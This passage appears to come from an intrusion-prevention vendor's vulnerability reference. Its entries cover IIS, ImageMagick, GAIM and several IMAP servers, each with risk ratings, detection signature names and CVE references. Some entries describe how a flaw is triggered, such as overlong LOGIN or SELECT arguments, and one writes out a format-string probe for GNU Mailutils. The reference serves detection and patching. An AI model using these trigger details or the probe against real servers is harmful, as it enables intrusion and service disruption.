https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334

MS01-026
http://technet.microsoft.com/security/bulletin/MS01-026

IIS-Iisadmpwd-DoS

About this vulnerability:

IIS iisadmpwd Denial of Service (MS00-031)

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1638-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Insecure Configuration

Description:

Microsoft IIS 4.0 and 5.0 allows changing a user's password. This can be exploited by sending a malformed password change request causing IIS to hang.

Situation:

HTTP_CSU-IIS-Htr-File-Fragment-Disclosure

References:

CVE-2000-0304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0304

BID-1191
http://www.securityfocus.com/bid/1191

MS00-031
http://technet.microsoft.com/security/bulletin/MS00-031

IIS-Isapi-Windows-Media-Services-BOF-MS03-019

About this vulnerability:

MS03-019 Buffer overflow in ISAPI Extension for Windows Media Services

Risk:

High

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS; Windows Media Services

Type:

Buffer Overflow

Description:

A buffer overflow in IIS ISAPI Extension for Windows Media Services allows remote attackers to execute arbitrary code.

Situation:

HTTP_CS-IIS-Isapi-Windows-Media-Services-BOF-1
HTTP_CRL-IIS-Isapi-Windows-Media-Services-BOF-3

References:

CVE-2003-0227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0227

MS03-019
http://technet.microsoft.com/security/bulletin/MS03-019

IIS-List-Argument-Heap-BOF

About this vulnerability:

Heap buffer overflow vulnerability in LIST command argument handling

Risk:

High

First detected in:

sgpkg-ips-28-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

A heap buffer overflow exists in some version of IIS. This can be triggered via sending a LIST/NLST command with overly long argument. Successful exploit may lead to remote admin compromise.

Situation:

FTP_CS-Oversized-List-Argument-Buffer-Overflow
FTP_CS-Oversized-List-Argument
FTP_CS-IIS-Nlst-BOF

References:

CVE-1999-0349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0349

MS99-003
http://technet.microsoft.com/security/bulletin/MS99-003

IIS-MS00-031-ISM-DLL-File-Disclosure

About this vulnerability:

IIS ism.dll file disclosure (MS00-031)

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Malfunction

Description:

The ism.dll in unpatched IIS 4.0 and 5.0 allows remote attacker to read file contents by requesting the file with a URI that has multiple encoded spaces and a terminating .htr extension appended to a filename. A successful attack may leak information that can be used to initiate a more severe attack for a potential remote compromise.

References:

CVE-2000-0457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0457

BID-1193
http://www.securityfocus.com/bid/1193

MS00-031
http://technet.microsoft.com/security/bulletin/MS00-031

IIS-Newdsn-Exe-Vulnerability

About this vulnerability:

IIS newdsn.exe vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 3.0

Type:

Metacharacter Injection

Description:

Newdsn.exe is a sample script available in IIS 3 installations. This script has a vulnerability that allows remote command execution. The vulnerability is located in the parsing of special characters. A successful exploit leads to a remote compromise of the vulnerable host.

References:

CVE-1999-0191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191

BID-1818
http://www.securityfocus.com/bid/1818

OSVDB-275
http://www.osvdb.org/275

IIS-RDS-Unsafe-Methods-Exposed

About this vulnerability:

IIS unsafe methods exposed through RDS

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 3.0; IIS 4.0

Type:

Insecure Configuration

Description:

Microsoft IIS exposes unsafe functions through the Remote Data Service. An attacker may be able to run arbitary code with the IIS privileges by using these unsafe functions.

References:

CVE-1999-1011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011

BID-529
http://www.securityfocus.com/bid/529

OSVDB-272
http://www.osvdb.org/272

MS99-025
http://technet.microsoft.com/security/bulletin/MS99-025

MS98-004
http://technet.microsoft.com/security/bulletin/MS98-004

IIS-Showcode

About this vulnerability:

IIS sample scripts allow viewing of files

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 4.0

Type:

Directory Traversal

Description:

Microsoft IIS provides several sample scripts to allow the user to view script files on the server. These sample scripts can be used to view other files on the system as well.

References:

CVE-1999-0736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0736

BID-167
http://www.securityfocus.com/bid/167

MS99-013
http://technet.microsoft.com/security/bulletin/MS99-013

IIS-Upload-File-Exploit

About this vulnerability:

IIS Upload File Exploit

Risk:

Moderate

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

There exists a vulnerability in IIS that allows a remote attacker to upload malicious files to the server.

Situation:

HTTP_CSU-Possible-IIS-Upload-File-Exploit

References:

MS02-062
http://technet.microsoft.com/security/bulletin/MS02-062

Illusion-Bot

About this vulnerability:	Illusion Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Illusin is a Botnet that can be used for multiple malicious activities, such as Distrubuted Denial of Service (DDoS) attacks.
Situation:	HTTP_CSU-Illusion-Bot-Activity

IM-GAIM-ICQ-Protocol-Away-Message-BOF

About this vulnerability:

Buffer overflow in GAIMs ICQ protocol away message handling

Risk:

High

First detected in:

sgpkg-ips-39-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GAIM

Type:

Buffer Overflow

Description:

GAIM, a multi-platform and multi-protocol instant messaging client, suffers from a buffer overflow in the handling of ICQ away messages. Special characters %d, %t and %n in an away message have a special meaning, and are expanded before they are displayed. GAIM stores uses a fixed buffer for the away message, which can be overflowed by including a large number of special characters in the message. The vulnerability is triggered when the specially-crafted away message is viewed, and allows arbitrary code execution. The attacker must be on the victims "buddy list" before the victim can view the malicious away message.

Situation:

IM-TCP_GAIM-ICQ-Protocol-Away-Message-BOF

References:

CVE-2005-2103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2103

BID-14531
http://www.securityfocus.com/bid/14531

IM2Net-Peer-To-Peer-Network-Usage

About this vulnerability:	IM2Net Peer-To-Peer Network usage
Risk:	Moderate
First detected in:	sgpkg-ips-202-2032
Last changed:	sgpkg-ips-1468-5242
Platform:	Generic
Software:	iMesh
Type:	Peer-to-Peer
Description:	IM2NEt is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	HTTP_CSU-iMeshV8-Download P2P-TCP_iMesh-Signin P2P-TCP_iMesh-Peer-Access

Imagemagick-Authenticate-Command-Injection

About this vulnerability:	A vulnerability in ImageMagick Studio ImageMagick
Risk:	High
First detected in:	sgpkg-ips-1313-5242
Last changed:	sgpkg-ips-1313-5242
Platform:	Generic
Software:	Imagemagick
Type:	Input Validation
Description:	A command injection vulnerability has been reported in ImageMagick. This vulnerability is due to improper validation of Authenticate tag in SVG image files. A remote, unauthenticated attacker can exploit this vulnerability by enticing an user to convert a malicious SVG file. Successful exploitation would result in arbitrary command execution under the security context of the user process.
Situation:	File-TextId_Imagemagick-Authenticate-Command-Injection

Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in ImageMagick Studio ImageMagick

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Input Validation

Description:

Improper validation of MVG files results in a file deletion vulnerability. A successful exploit allows an attacker to delete arbitrary files on the host system.

Situation:

File-Text_Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion

References:

CVE-2016-3715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715

Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in ImageMagick

Risk:

Moderate

First detected in:

sgpkg-ips-445-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

ImageMagick is a software suite to used create, edit, and compose bitmap images. It can read, convert, and write images in a variety of formats. It is commonly used in CGI scripts and through PHP interfaces for image manipulation on web servers. A memory access error vulnerability has been reported in ImageMagick. The vulnerability is due to a boundary error in the ImageMagick library specifically while handling crafted ResolutionUnit tags in EXIF headers. Remote attackers could exploit this vulnerability by uploading a malicious image file to a vulnerable server or by persuading a target user to open such an image file in a desktop program that uses the vulnerable version of ImageMagick. Successful exploitation would cause memory corruption, which may lead to arbitrary code execution in the security context of the affected server application or the logged-in user.

Situation:

HTTP_CS-Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
File-JPEG_Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption

References:

CVE-2012-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0247

BID-51957
http://www.securityfocus.com/bid/51957

OSVDB-79003
http://www.osvdb.org/79003

Imagemagick-File-Deletion-Vulnerability

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

A vulnerability in ImageMagick allows a remote attacker to delete files via a crafted image.

Situation:

File-Text_Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion

References:

CVE-2016-3715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715

Imagemagick-File-Moving-Vulnerability

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

A vulnerability in ImageMagick allows a remote attacker to move image files into files with any extension via a crafted image.

Situation:

File-Text_Imagemagick-File-Moving-Vulnerability

References:

CVE-2016-3716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716

Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow

About this vulnerability:

An ImageMagick GIF Comment Processing Off-by-one Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in ImageMagick which allows remote attackers to cause a denial of service condition or execute arbitrary code by uploading a maliciously crafted GIF image to a vulnerable web server, due to insufficient validation of certain fields within a GIF image.

Situation:

File-GIF_Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow

References:

CVE-2013-4298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4298

Imagemagick-HTTP_Request_Vulnerability

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

A vulnerability in ImageMagick allows a remote attacker to conduct server-side request forgery attacks via a crafted image.

Situation:

File-Text_Imagemagick-HTTP-Request-Vulnerability

References:

CVE-2016-3718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718

Imagemagick-Local-File-Read-Vulnerability

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

A vulnerability in ImageMagick allows a remote attacker to read contents of the files on a server via a crafted image.

Situation:

File-Text_Imagemagick-Local-File-Read-Vulnerability

References:

CVE-2016-3717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717

Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection

About this vulnerability:

A vulnerability in ImageMagick.

Risk:

High

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1435-5242

Platform:

Generic

Software:

Imagemagick

Type:

Input Validation

Description:

A vulnerability in ImageMagick Studio ImageMagick, 7.1.0-23 and before, which allows remote attackers to execute arbitrary commands on a target system by enticing a victum to perform a command on a malicious file, due to insufficient input validation when passing commands for Ghostscript to execute.

Situation:

File-TextId_Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection

References:

CVE-2021-3781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3781

Imagemagick-PNG-Text-Profile-Arbitrary-File-Read

About this vulnerability:

A vulnerability in ImageMagick

Risk:

Moderate

First detected in:

sgpkg-ips-1560-5242

Last changed:

sgpkg-ips-1560-5242

Platform:

Generic

Software:

Imagemagick

Type:

Input Validation

Description:

An arbitrary file read vulnerability has been reported for ImageMagick. This vulnerability is due to improper input validation of textual chunk types containing the "profile" keyword when parsing PNG files. A remote attacker could exploit this vulnerability by enticing the victim to use a crafted file. Successfully exploiting this vulnerability could result in disclosure of file contents.

Situation:

File-PNG_Imagemagick-PNG-Text-Profile-Arbitrary-File-Read

References:

CVE-2022-44268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268

Imagemagick-PNG-Text-Profile-Denial-Of-Service

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-1561-5242

Last changed:

sgpkg-ips-1561-5242

Platform:

Generic

Software:

Imagemagick

Type:

Input Validation

Description:

A denial of service vulnerability has been reported for ImageMagick. This vulnerability is due to improper input validation of textual chunk types containing the "profile" keyword when parsing PNG files. A remote attacker could exploit this vulnerability by enticing the victim to use a crafted file. Successfully exploiting this vulnerability could result in denial of service.

Situation:

File-PNG_Imagemagick-PNG-Text-Profile-Denial-Of-Service

References:

CVE-2022-44267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267

Imagemagick-Popen-Shell-Character-Filtering-Code-Execution

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

ImageMagick popen() function has insufficient filtering for shell characters. A remote attacker can use this to execute code on the affected system.

Situation:

File-TextId_Imagemagick-Shell-Character-Filtering-Code-Execution
File-Text_Imagemagick-Shell-Character-Filtering-Code-Execution

References:

CVE-2016-5118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5118

Imagemagick-Shell-Character-Filtering-Code-Execution

About this vulnerability:

A vulnerability in ImageMagick

Risk:

High

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

ImageMagick has insufficient filtering for shell characters. A remote attacker can use this to execute code on the affected system.

Situation:

File-TextId_Imagemagick-Shell-Character-Filtering-Code-Execution
File-Text_Imagemagick-Shell-Character-Filtering-Code-Execution

References:

CVE-2016-3714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714

Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing

About this vulnerability:

A vulnerability in ImageMagick Studio ImageMagick

Risk:

Moderate

First detected in:

sgpkg-ips-810-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Malfunction

Description:

Improper handling of image EXIF data in ImageMagick causes an out-of-bounds array indexing vulnerability. A succesful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-JPEG_Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing

References:

CVE-2016-7799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7799

IMAP-Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption

About this vulnerability:

Buffer overflow vulnerability in the Atrium MERCUR IMAP service

Risk:

Critical

First detected in:

sgpkg-ips-108-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mercur Messaging

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the Atrium MERCUR IMAP service. A crafted NTLM type 3 message allows arbitrary code execution with System level privileges.

Situation:

IMAP_Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption

References:

CVE-2007-1578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1578

BID-23058
http://www.securityfocus.com/bid/23058

OSVDB-33545
http://www.osvdb.org/33545

IMAP-Epost-Spa-Pro-Mail-Create-Buffer-Overflow

About this vulnerability:

Buffer overflow in E-Post's Spa-Pro mail server

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

E-Post SPA-PRO Mail

Type:

Buffer Overflow

Description:

E-Post Spa-Pro Mail's IMAP server has a buffer overflow vulnerability in the handling of long CREATE requests. Remote attackers can execute arbitrary code on the server by sending a CREATE command with mailbox name that is over 256 bytes long.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command

References:

BID-13839
http://www.securityfocus.com/bid/13839

IMAP-Gnu-Mailutils-Command-Tag-Format-String-System-Compromise

About this vulnerability:

Format strings vulnerability in GNU Mailutils 0.5 and 0.6 allow system compromise

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GNU Mailutils

Type:

Format String

Description:

Gnu Mailutils 0.5 and 0.6 suffer from a format string vulnerability in the command tag handling. Each IMAP command is prefixed with a unique command tag by the client, which the server includes in its reply to the command. Gnu Mailutils does not filter the input sufficiently, allowing remote attackers to execute arbitrary code by sending a command tag that includes format string sequences.

Situation:

IMAP_CS-Gnu-Mailutils-IMap4d-Format-String-Vulnerability

References:

CVE-2005-1523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1523

BID-13764
http://www.securityfocus.com/bid/13764

IMAP-Gnu-Mailutils-IMap4d-Search-Compromise

About this vulnerability:

Format strings vulnerability in GNU Mailutils IMAP4d search function

Risk:

High

First detected in:

sgpkg-ips-39-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GNU Mailutils

Type:

Format String

Description:

GNU Mailutils IMAP4D suffers from a format string vulnerability in the search function. A command like "SEARCH TOPIC %08x.%08x.%08x.%08x" will result in an error string containing values that where actually supplied to the search function. The vulnerability allows remote attackers to write values into memory, leading to arbitrary code execution.

Situation:

IMAP_Gnu-Mailutils-IMap4d-Search-Compromise

References:

CVE-2005-2878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2878

BID-14794
http://www.securityfocus.com/bid/14794

IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Ipswitch IMail Server search function

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Ipswitch IMail Server search function. After authentication to the vulnerable IMAP server, a SEARCH command with a malicious CHARSET argument allows arbitrary code execution with the privileges of the affected service.

Situation:

IMAP_Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow

References:

CVE-2007-3925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3925

BID-24962
http://www.securityfocus.com/bid/24962

OSVDB-36220
http://www.osvdb.org/36220

IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Ipswitch IMail Server search command

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the Ipswitch IMail Server search command. After authentication to the vulnerable IMAP server, a SEARCH command with a malicious DATE string allows arbitrary code execution with the privileges of the affected service, normally System.

Situation:

IMAP_Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow

References:

CVE-2007-3925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3925

BID-24962
http://www.securityfocus.com/bid/24962

OSVDB-36219
http://www.osvdb.org/36219

IMAP-Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Ipswitch IMail Server subscribe command handling

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Ipswitch IMail Server subscribe command handling. After authentication to the vulnerable IMAP server, a SUBSCRIBE command with a malicious MAILBOX argument allows arbitrary code execution with the privileges of the affected service, which is normally the System account.

Situation:

IMAP_Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow

References:

CVE-2007-2795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2795

BID-24962
http://www.securityfocus.com/bid/24962

OSVDB-36221
http://www.osvdb.org/36221

IMAP-Ipswitch-IMail-Server-List-Command-Denial-Of-Service

About this vulnerability:

Ipswitch IMail server LIST command handling vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail; Ipswitch Collaboration Suite

Type:

Buffer Overflow

Description:

Ipswitch IMail Server suffers from a buffer overflow vulnerability in the handling of the IMAP LIST command. If the second argument, MailboxName, is longer than 7408 bytes a buffer overflow occurs. The overflow leads to an unhandled exception which terminates the service. The vulnerability can only be exploited by authenticated users, and does not allow attackers to execute code.

Situation:

IMAP_Ipswitch-IMail-Server-List-Command-Denial-Of-Service

References:

CVE-2005-2923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2923

BID-15753
http://www.securityfocus.com/bid/15753

IMAP-Ipswitch-IMail-Web-Calendar-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Ipswitch IMail web calendar server.

Risk:

Low

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000; Windows XP; Windows 2003

Software:

IMail

Type:

Directory Traversal

Description:

Ipswitch IMail Web Calendar server (HTTP server running by default on tcp port 8484) does not handle correctly requests for nonexistent .jsp files. By passing a long string of directory traversal sequences (\..) to a nonexistent .jsp, remote attackers can traverse the servers file system and view arbitrary files. No authentication is required, the vulnerability can be exploited easily with a web browser.

Situation:

HTTP_CSU-Ipswitch-IMail-Web-Calendar-File-Disclosure

References:

CVE-2005-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1252

BID-13727
http://www.securityfocus.com/bid/13727

IMAP-Ipswitch-IMAP-Login-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Ipswitch IMAP's login command.

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail; Ipswitch Collaboration Suite

Type:

Buffer Overflow

Description:

Ipswitch IMail IMAP server suffers from a buffer overflow vulnerability in the handling of arguments to the LOGIN command. A long username of around 2000 bytes will cause a buffer overflow, allowing arbitrary command execution. Since the vulnerability is in the login command, no authentication is required to exploit the software. Another variant of the vulnerability exists if the login name is prefixed with a special character %, :, *, @ or &. Login names prefixed with one of these special characters also lead to a buffer overflow but the situation is easier to exploit.

Situation:

IMAP_Excessively-Long-Username-Argument-In-IMAP-Login-Command

References:

CVE-2005-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1255

BID-13727
http://www.securityfocus.com/bid/13727

IMAP-Ipswitch-IMAP-Lsub-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Ipswitch ICS IMAP daemon.

Risk:

Low

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ipswitch Collaboration Suite; IMail

Type:

Malfunction

Description:

Ipswitch Collaboration Suites's IMAP server suffers from a denial of service vulnerability. A long string of NULL characters sent as an argument to the LSUB command causes heavy load on the server, eventually leading to resource starvation and a denial of service. The LSUB command can be used only after authentication, limiting the impact of the vulnerability.

Situation:

IMAP_Ipswitch-IMAP-Lsub-Denial-Of-Service

References:

CVE-2005-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1249

BID-13727
http://www.securityfocus.com/bid/13727

IMAP-Ipswitch-IMAP-Select-Command-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Ipswitch IMAP server, SELECT command.

Risk:

Low

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

Ipswitch IMail IMAP server does not correctly handle long arguments to the SELECT command. A long, at least 260 byte argument to the SELECT command causes a buffer overflow which crashes the IMAP server. Only authenticated users can issue the SELECT command, limiting the impact of the vulnerability.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command

References:

CVE-2005-1254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1254

BID-13727
http://www.securityfocus.com/bid/13727

IMAP-Ipswitch-IMAP-Status-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Ipswitch IMAP's status command.

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

Ipswitch IMail IMAP server does not handle correctly long input to the STATUS command. By supplying a sufficiently long mailbox name to the STATUS command a buffer overflow will occur, allowing arbitrary code execution. The STATUS command can only be issued after authentication, limiting the impact of the vulnerability.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command

References:

CVE-2005-1256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1256

BID-13727
http://www.securityfocus.com/bid/13727

IMAP-Ipswitch-Server-Fetch-Command-Buffer-Overflow

About this vulnerability:

Ipswitch IMAP server FETCH command buffer overflow vulnerabilites

Risk:

Moderate

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IMail

Type:

Buffer Overflow

Description:

The Ipswitch IMAP server does not parse FETCH command arguments correctly. A long value in the FETCH command's BODY or BODY.PEEK argument can overflow a buffer and lead to arbitrary code execution. Authentication is required to issue the FETCH command, limiting the scope of the vulnerability.

Situation:

IMAP_Ipswitch-Server-Fetch-Command-Buffer-Overflow

References:

CVE-2005-3526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3526

BID-17063
http://www.securityfocus.com/bid/17063

OSVDB-23796
http://www.osvdb.org/23796

IMAP-Kerio-MailServer-Large-Literal-Octet-Counter-Denial-Of-Service

About this vulnerability:	Kerio MailServer large literal octet counter string vulnerability
Risk:	Moderate
First detected in:	sgpkg-ips-62-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Kerio MailServer
Type:	Malfunction
Description:	Kerio MailServer 6.1.3 and prior do not handle large literal octet counters correctly. The counters are checked for a maximum size, but if the counter value is larger than 2147483647 it is handled as negative value and always passes the test. Later the large value causes an exception and forces the server process to terminate, causing a denial of service situation.
Situation:	IMAP_Large-Literal-Octet-Counter-Value

IMAP-Login-Buffer-Overflow

About this vulnerability:

Buffer overflow in multiple imap daemons.

Risk:

Critical

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netscape Messaging Server; University of Washington imapd

Type:

Buffer Overflow

Description:

By supplying a parameter longer than 1024 bytes to the AUTHENTICATE command, the attacker can exploit a buffer-overflow condition in certain imapd implementations, making it possible to execute arbitrary commands with administrator privileges.

Situation:

IMAP_WU-IMAPD-Authenticate-BOF

References:

CVE-1999-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0005

BID-130
http://www.securityfocus.com/bid/130

IMAP-MailEnable-IMAP-Command-Buffer-Overflow

About this vulnerability:

MailEnable Professional buffer overflow with long IMAP commands

Risk:

High

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MailEnable

Type:

Buffer Overflow

Description:

MailEnable Professional and Enterprise suffer from a buffer overflow vulnerability in the handling of long or invalid arguments to IMAP commands. Denial of service and arbitrary command execution are possible with a successful exploit.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command

References:

CVE-2005-3993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3993

OSVDB-21388
http://www.osvdb.org/21388

IMAP-MailEnable-IMAP-Service-Buffer-Overflow

About this vulnerability:

MailEnable buffer overflow with long IMAP commands

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MailEnable

Type:

Buffer Overflow

Description:

MailEnable Professional and Enterprise suffer from a buffer overflow vulnerability with long IMAP commands. Denial of service and root/system-level compromise are possible with a successful exploit.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Subscribe-Command
